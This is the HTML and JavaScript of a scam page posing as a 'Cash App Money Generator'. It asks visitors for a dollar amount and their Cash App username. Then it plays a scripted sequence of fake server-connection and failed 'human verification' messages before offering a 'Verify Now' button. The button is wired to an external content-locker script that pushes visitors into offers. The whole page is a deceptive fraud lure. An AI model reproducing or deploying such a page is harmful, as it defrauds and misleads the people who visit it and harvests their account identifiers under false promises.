<!DOCTYPE html>
<!--

-->
<html>

<head>
    <title>Link Locked</title>
    <meta name="description" content="Link Locked" />
    <meta property="og:title" content="Link Locked" />
    <meta property="og:description" content="Link Locked" />
    <meta name="referrer" content="no-referrer">

    <!-- Analytics -->

    <script src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
    <script>
        Sentry.init({
            dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
            tracesSampleRate: 0.01
        });
    </script>
    <script>
        (function(i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function() {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o), m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


        ga('create', 'UA-168596379-1', 'auto');
        ga('send', 'pageview');
    </script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }

        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }

        body {
            margin: 0;
            font-family: Roboto, sans-serif;
            color: #444;
        }

        .unlockBtn:hover {
            box-shadow: 0 3px 6px rgba(0, 0, 0, .16), 0 3px 6px rgba(0, 0, 0, .23);
        }

        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0, 0, 0, .12), 0 1px 2px rgba(0, 0, 0, .24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto, sans-serif !important;
            outline: 0 !important;
            color: white;
        }

        .content-container {
            width: 80%;
            margin: 0 auto;
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 300;
            src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
            unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 300;
            src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 500;
            src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
            unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
        }

        @font-face {
            font-family: 'Roboto';
            font-style: normal;
            font-weight: 500;
            src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
            unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
        }

        /* Please ❤ this if you like it! */

        @import url('https://fonts.googleapis.com/css?family=Poppins:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i&subset=devanagari,latin-ext');
        :root {
            --white: #ffffff;
            --light: #f0eff3;
            --black: #000000;
            --dark-blue: #1f2029;
            --dark-light: #00c853;
            --red: #da2c4d;
            --yellow: #f8ab37;
            --grey: #ecedf3;
        }

        /* #Primary
================================================== */

        body {
            width: 100%;
            background: var(--dark-blue);
            overflow-x: hidden;
            font-family: 'Poppins', sans-serif;
            font-size: 17px;
            line-height: 30px;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        p {
            font-family: 'Poppins', sans-serif;
            font-size: 17px;
            line-height: 30px;
            color: var(--white);
            letter-spacing: 1px;
            font-weight: 500;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        ::selection {
            color: var(--white);
            background-color: var(--black);
        }

        ::-moz-selection {
            color: var(--white);
            background-color: var(--black);
        }

        mark {
            color: var(--white);
            background-color: var(--black);
        }

        .section {
            position: relative;
            width: 100%;
            display: block;
            text-align: center;
            margin: 0 auto;
        }

        .over-hide {
            overflow: hidden;
        }

        .z-bigger {
            z-index: 100 !important;
        }

        .background-color {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: var(--dark-blue);
            z-index: 1;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox:checked~.background-color {
            background-color: var(--white);
        }

        [type="checkbox"]:checked,
        [type="checkbox"]:not(:checked),
        [type="radio"]:checked,
        [type="radio"]:not(:checked) {
            position: absolute;
            left: -9999px;
            width: 0;
            height: 0;
            visibility: hidden;
        }

        .checkbox:checked+label,
        .checkbox:not(:checked)+label {
            position: relative;
            width: 70px;
            display: inline-block;
            padding: 0;
            margin: 0 auto;
            text-align: center;
            margin: 17px 0;
            margin-top: 25px;
            height: 6px;
            border-radius: 4px;
            background-image: linear-gradient(298deg, var(--red), var(--yellow));
            z-index: 100 !important;
        }

        .checkbox:checked+label:before,
        .checkbox:not(:checked)+label:before {
            position: absolute;
            font-family: 'unicons';
            cursor: pointer;
            top: -17px;
            z-index: 2;
            font-size: 20px;
            line-height: 40px;
            text-align: center;
            width: 40px;
            height: 40px;
            border-radius: 50%;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox:not(:checked)+label:before {
            content: '\eac1';
            left: 0;
            color: var(--grey);
            background-color: var(--dark-light);
            box-shadow: 0 4px 4px rgba(0, 0, 0, 0.15), 0 0 0 1px rgba(26, 53, 71, 0.07);
        }

        .checkbox:checked+label:before {
            content: '\eb8f';
            left: 30px;
            color: var(--yellow);
            background-color: var(--dark-blue);
            box-shadow: 0 4px 4px rgba(26, 53, 71, 0.25), 0 0 0 1px rgba(26, 53, 71, 0.07);
        }

        .checkbox:checked~.section .container .row .col-12 p {
            color: var(--dark-blue);
        }

        .checkbox-tools:checked+label,
        .checkbox-tools:not(:checked)+label {
            position: relative;
            display: inline-block;
            padding: 5px;
            width: 110px;
            font-size: 14px;
            line-height: 20px;
            letter-spacing: 1px;
            margin: 0 auto;
            margin-left: 5px;
            margin-right: 5px;
            margin-bottom: 10px;
            text-align: center;
            border-radius: 4px;
            overflow: hidden;
            cursor: pointer;
            text-transform: uppercase;
            color: var(--white);
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox-tools:not(:checked)+label {
            background-color: var(--dark-light);
            box-shadow: 0 2px 4px 0 rgba(0, 0, 0, 0.1);
        }

        .checkbox-tools:checked+label {
            background-color: transparent;
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-tools:not(:checked)+label:hover {
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-tools:checked+label::before,
        .checkbox-tools:not(:checked)+label::before {
            position: absolute;
            content: '';
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border-radius: 4px;
            background-image: linear-gradient(298deg, var(--red), var(--yellow));
            z-index: -1;
        }

        .checkbox-tools:checked+label .uil,
        .checkbox-tools:not(:checked)+label .uil {
            font-size: 24px;
            line-height: 24px;
            display: block;
            padding-bottom: 10px;
        }

        .checkbox:checked~.section .container .row .col-12 .checkbox-tools:not(:checked)+label {
            background-color: var(--light);
            color: var(--dark-blue);
            box-shadow: 0 1x 4px 0 rgba(0, 0, 0, 0.05);
        }

        .checkbox-budget:checked+label,
        .checkbox-budget:not(:checked)+label {
            position: relative;
            display: inline-block;
            padding: 0;
            padding-top: 20px;
            padding-bottom: 20px;
            width: 260px;
            font-size: 52px;
            line-height: 52px;
            font-weight: 700;
            letter-spacing: 1px;
            margin: 0 auto;
            margin-left: 5px;
            margin-right: 5px;
            margin-bottom: 10px;
            text-align: center;
            border-radius: 4px;
            overflow: hidden;
            cursor: pointer;
            text-transform: uppercase;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
            -webkit-text-stroke: 1px var(--white);
            text-stroke: 1px var(--white);
            -webkit-text-fill-color: transparent;
            text-fill-color: transparent;
            color: transparent;
        }

        .checkbox-budget:not(:checked)+label {
            background-color: var(--dark-light);
            box-shadow: 0 2px 4px 0 rgba(0, 0, 0, 0.1);
        }

        .checkbox-budget:checked+label {
            background-color: transparent;
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-budget:not(:checked)+label:hover {
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-budget:checked+label::before,
        .checkbox-budget:not(:checked)+label::before {
            position: absolute;
            content: '';
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border-radius: 4px;
            background-image: linear-gradient(138deg, var(--red), var(--yellow));
            z-index: -1;
        }

        .checkbox-budget:checked+label span,
        .checkbox-budget:not(:checked)+label span {
            position: relative;
            display: block;
        }

        .checkbox-budget:checked+label span::before,
        .checkbox-budget:not(:checked)+label span::before {
            position: absolute;
            content: attr(data-hover);
            top: 0;
            left: 0;
            width: 100%;
            overflow: hidden;
            -webkit-text-stroke: transparent;
            text-stroke: transparent;
            -webkit-text-fill-color: var(--white);
            text-fill-color: var(--white);
            color: var(--white);
            -webkit-transition: max-height 0.3s;
            -moz-transition: max-height 0.3s;
            transition: max-height 0.3s;
        }

        .checkbox-budget:not(:checked)+label span::before {
            max-height: 0;
        }

        .checkbox-budget:checked+label span::before {
            max-height: 100%;
        }

        .checkbox:checked~.section .container .row .col-xl-10 .checkbox-budget:not(:checked)+label {
            background-color: var(--light);
            -webkit-text-stroke: 1px var(--dark-blue);
            text-stroke: 1px var(--dark-blue);
            box-shadow: 0 1x 4px 0 rgba(0, 0, 0, 0.05);
        }

        .checkbox-booking:checked+label,
        .checkbox-booking:not(:checked)+label {
            position: relative;
            display: -webkit-inline-flex;
            display: -ms-inline-flexbox;
            display: inline-flex;
            -webkit-align-items: center;
            -moz-align-items: center;
            -ms-align-items: center;
            align-items: center;
            -webkit-justify-content: center;
            -moz-justify-content: center;
            -ms-justify-content: center;
            justify-content: center;
            -ms-flex-pack: center;
            text-align: center;
            padding: 0;
            padding: 6px 25px;
            font-size: 14px;
            line-height: 30px;
            letter-spacing: 1px;
            margin: 0 auto;
            margin-left: 6px;
            margin-right: 6px;
            margin-bottom: 16px;
            text-align: center;
            border-radius: 4px;
            cursor: pointer;
            color: var(--white);
            text-transform: uppercase;
            background-color: var(--dark-light);
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox-booking:not(:checked)+label::before {
            box-shadow: 0 2px 4px 0 rgba(0, 0, 0, 0.1);
        }

        .checkbox-booking:checked+label::before {
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-booking:not(:checked)+label:hover::before {
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
        }

        .checkbox-booking:checked+label::before,
        .checkbox-booking:not(:checked)+label::before {
            position: absolute;
            content: '';
            top: -2px;
            left: -2px;
            width: calc(100% + 4px);
            height: calc(100% + 4px);
            border-radius: 4px;
            z-index: -2;
            background-image: linear-gradient(138deg, var(--red), var(--yellow));
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox-booking:not(:checked)+label::before {
            top: -1px;
            left: -1px;
            width: calc(100% + 2px);
            height: calc(100% + 2px);
        }

        .checkbox-booking:checked+label::after,
        .checkbox-booking:not(:checked)+label::after {
            position: absolute;
            content: '';
            top: -2px;
            left: -2px;
            width: calc(100% + 4px);
            height: calc(100% + 4px);
            border-radius: 4px;
            z-index: -2;
            background-color: var(--dark-light);
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox-booking:checked+label::after {
            opacity: 0;
        }

        .checkbox-booking:checked+label .uil,
        .checkbox-booking:not(:checked)+label .uil {
            font-size: 20px;
        }

        .checkbox-booking:checked+label .text,
        .checkbox-booking:not(:checked)+label .text {
            position: relative;
            display: inline-block;
            -webkit-transition: opacity 300ms linear;
            transition: opacity 300ms linear;
        }

        .checkbox-booking:checked+label .text {
            opacity: 0.6;
        }

        .checkbox-booking:checked+label .text::after,
        .checkbox-booking:not(:checked)+label .text::after {
            position: absolute;
            content: '';
            width: 0;
            left: 0;
            top: 50%;
            margin-top: -1px;
            height: 2px;
            background-image: linear-gradient(138deg, var(--red), var(--yellow));
            z-index: 1;
            -webkit-transition: all 300ms linear;
            transition: all 300ms linear;
        }

        .checkbox-booking:not(:checked)+label .text::after {
            width: 0;
        }

        .checkbox-booking:checked+label .text::after {
            width: 100%;
        }

        .checkbox:checked~.section .container .row .col-12 .checkbox-booking:not(:checked)+label,
        .checkbox:checked~.section .container .row .col-12 .checkbox-booking:checked+label {
            background-color: var(--light);
            color: var(--dark-blue);
        }

        .checkbox:checked~.section .container .row .col-12 .checkbox-booking:checked+label::after,
        .checkbox:checked~.section .container .row .col-12 .checkbox-booking:not(:checked)+label::after {
            background-color: var(--light);
        }

        .link-to-page {
            position: fixed;
            top: 30px;
            right: 30px;
            z-index: 20000;
            cursor: pointer;
            width: 50px;
        }

        .link-to-page img {
            width: 100%;
            height: auto;
            display: block;
        }

        .logo {
            display: flex;
            position: relative;
            max-width: 160px;
            margin: auto;
            z-index: 9999;
        }

        .headertext {
            position: relative;
            text-align: center;
            font-size: 30px;
            font-weight: 900;
            color: #00c853;
            margin: auto;
            z-index: 9999;
        }

        .iconimg {
            max-width: 40px;
            filter: invert(1);
        }

        .btn {
            cursor: pointer;
            max-width: 220px;
            background: #00d632;
            color: #ffffff;
            font-size: 30px;
            font-weight: 900;
            border-radius: 4px;
            margin: auto;
            margin-top: 20px;
            margin-bottom: 50px;
            padding: 20px;
        }

        .btn:hover {
            background-image: linear-gradient(138deg, var(--red), var(--yellow));
        }

        #errorname {
            color: red;
            padding: 10px;
        }

        .Gen-Text {
            color: red;
            font-size: 25px;
            margin-bottom: 10px;
        }

        .settingimg {
            width: 80px;
            margin-top: 0px;
            filter: sepia(100%);
            -webkit-filter: sepia(100%);
        }
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body>
    <!DOCTYPE html>
    <html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <title>Cash App - Money Generator</title>
        <link rel="stylesheet" type="text/css" href="style.css" />
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Passion+One:wght@700&display=swap" rel="stylesheet">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Yanone+Kaffeesatz&display=swap" rel="stylesheet">



    </head>

    <body>

        <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="logo">
        <div class="headertext">CASHAPP MONEY GENERATOR</div>

        <div class="section over-hide z-bigger">
            <input class="checkbox" type="checkbox" name="general" id="general">
            <label class="for-checkbox" for="general"></label>
            <div class="background-color"></div>
            <div class="section over-hide z-bigger">
                <div class="container pb-5">
                    <div class="row justify-content-center pb-5" id="box1">
                        <div class="col-12 pt-5">
                            <p class="mb-4 pb-2">YOUR PLATFORM</p>
                        </div>
                        <div class="col-12 pb-5">
                            <input class="checkbox-tools" type="radio" name="tools" id="tool-1" checked>
                            <label class="for-checkbox-tools" for="tool-1">
							<i class='uil uil-line-alt'></i>
              <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/16629667976bc164432937c6723eeb2f02d24182dc.png" class="iconimg">
							Android 
						</label>
                            <!--
						--><input class="checkbox-tools" type="radio" name="tools" id="tool-2">
                            <label class="for-checkbox-tools" for="tool-2">
							<i class='uil uil-vector-square'></i>
              <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1662966798d9b5cf8d47d6f917c926a1b48d9d8f8a.png" class="iconimg"><br>
							iOS
						</label>
                            <!--
						--><input class="checkbox-tools" type="radio" name="tools" id="tool-3">
                            <label class="for-checkbox-tools" for="tool-3">
							<i class='uil uil-ruler'></i>
              <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1662966798fe77975f9140ae86e430145aff1f888b.png" class="iconimg">
							Windows
						</label>
                        </div>
                        <div class="col-12 pt-1">
                            <p id="money" class="mb-4 pb-2">Select the amount of Dollars</p>
                        </div>
                        <div class="col-xl-10 pb-5">
                            <input class="checkbox-budget" type="radio" name="budget" id="budget-1" checked>
                            <label class="for-checkbox-budget" for="budget-1">
							<span data-hover="50$">50$</span>
						</label>
                            <!--
						--><input class="checkbox-budget" type="radio" name="budget" id="budget-2">
                            <label class="for-checkbox-budget" for="budget-2">							
							<span data-hover="100$">100$</span>
						</label>
                            <!--
						--><input class="checkbox-budget" type="radio" name="budget" id="budget-3">
                            <label class="for-checkbox-budget" for="budget-3">							
							<span data-hover="150$">150$</span>
						</label>
                            <!--
						--><input class="checkbox-budget" type="radio" name="budget" id="budget-4">
                            <label class="for-checkbox-budget" for="budget-4">							
							<span data-hover="250$">250$</span>
						</label>
                            <!--
						--><input class="checkbox-budget" type="radio" name="budget" id="budget-5">
                            <label class="for-checkbox-budget" for="budget-5">							
							<span data-hover="500$">500$</span>
						</label>
                            <!--
						--><input class="checkbox-budget" type="radio" name="budget" id="budget-6">
                            <label class="for-checkbox-budget" for="budget-6">							
							<span data-hover="1000$">1000$</span>
						</label>
                        </div>
                        <div class="col-12 pt-1">
                            <p id="uid" class="mb-4 pb-2">Please enter your Cash App Username/ID or Email:</p>
                            <div class="errorname showin" style="display:none" id="errorname">Error: Username or ID can't be empty!</span>
                            </div>
                            <input style="padding: 15px 50px; border-radius: 4px; " type="text" id="name" class="inputname" placeholder="@Cashtag" autocomplete="off">
                            <div id="button2" onclick="button()" class="btn">NEXT</div>
                        </div>




                    </div>

                    <div id="box2" style="display: none;">
                        <img src="https://d2lmlpk6xgu7kg.cloudfront.net/uploads/1661927786f35d94ed9c21a5fc902f0bb5fea90f15.gif" class="settingimg"></img>
                        <div class="Gen-Text" id="Gentext">Loading...</div>

                        <div style="display: none;" id="button3" onclick="_Ts()" class="btn">Verify Now</div>

                    </div>

                </div>
            </div>



    </body>
    <script src="main.js"></script>

    </html>


    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <<script type="text/javascript">
    var KftAx_MQL_uVtZEc={"it":4318296,"key":"13c02"};
</script>
<script src="https://d3qborf6vf5lth.cloudfront.net/37528d6.js"></script>
    <script type="text/javascript">
        $('.showContentLocker').click(function() {
            _Ts();
            return false;
        });
    </script>
    <script>
    </script>
    <script type="text/javascript">
        var name = "";

        function button() {
            name = document.getElementById("name").value;
            if (name == "") {
                document.getElementById("errorname").style.display = "block";

            } else {
                document.getElementById('box1').style.display = "none";
                document.getElementById('box2').style.display = "block";

                setTimeout(function() {
                    document.getElementById("Gentext").innerHTML = "Loading...";

                    setTimeout(function() {
                        document.getElementById("Gentext").innerHTML = "Connecting to Cash App Server...";

                        setTimeout(function() {

                            document.getElementById("Gentext").innerHTML = "Connected Successfully";

                            setTimeout(function() {

                                document.getElementById("Gentext").innerHTML = "Searching User: " + '<span style="color:#00d632;text-shadow: 0 0 2px white;    font-size: 24px;">' + name + "</span>";
                                setTimeout(function() {
                                    document.getElementById("Gentext").innerHTML = "User Found";


                                    setTimeout(function() {

                                        document.getElementById("Gentext").innerHTML = "Connecting to User Database...";
                                        setTimeout(function() {

                                            document.getElementById("Gentext").innerHTML = "Connected Successfully";

                                            setTimeout(function() {

                                                document.getElementById("Gentext").innerHTML = "Adding Resources...";
                                                setTimeout(function() {
                                                    document.getElementById("Gentext").innerHTML = "Security Firewall Detected!";

                                                    setTimeout(function() {
                                                        document.getElementById("Gentext").innerHTML = "Verifying human...";
                                                        setTimeout(function() {
                                                            document.getElementById("Gentext").innerHTML = "Launching Automatic Human Verification (1/3)";
                                                            setTimeout(function() {
                                                                document.getElementById("Gentext").style.color = "red";
                                                                document.getElementById("Gentext").innerHTML = "Human Verification Failed (2 Attempt Remaining)";
                                                                setTimeout(function() {

                                                                    document.getElementById("Gentext").innerHTML = "Human Verification Failed (Skipping)";

                                                                    setTimeout(function() {
                                                                        document.getElementById("Gentext").innerHTML = "Launching Automatic Human Verification (2/3)";
                                                                        setTimeout(function() {
                                                                            document.getElementById("Gentext").style.color = "red";
                                                                            document.getElementById("Gentext").innerHTML = "Human Verification Failed (1 Attempt Remaining)";
                                                                            setTimeout(function() {

                                                                                document.getElementById("Gentext").innerHTML = "Human Verification Failed (Skipping)";

                                                                                setTimeout(function() {
                                                                                    document.getElementById("Gentext").style.color = "red";
                                                                                    document.getElementById("Gentext").innerHTML = "Manual Verification Required!";

                                                                                    setTimeout(function() {
                                                                                        document.getElementById("Gentext").innerHTML = "Launching Manual Human Verification...";

                                                                                        setTimeout(function() {
                                                                                            document.getElementById("button3").style.display = "block";

                                                                                        }, 500);
                                                                                    }, 500);
                                                                                }, 500);
                                                                            }, 500);
                                                                        }, 500);
                                                                    }, 500);
                                                                }, 500);
                                                            }, 500);
                                                        }, 500);
                                                    }, 500);
                                                }, 500);
                                            }, 500);
                                        }, 500);
                                    }, 500);
                                }, 500);
                            }, 500);
                        }, 500);
                    }, 500);
                }, 500);
            }
        }
    </script>
    <script>
        if (typeof window.ga === 'function') {
            ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
            ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
            ga('customTemplateGlobal.send', 'pageView');
        }
    </script>
</body>

</html>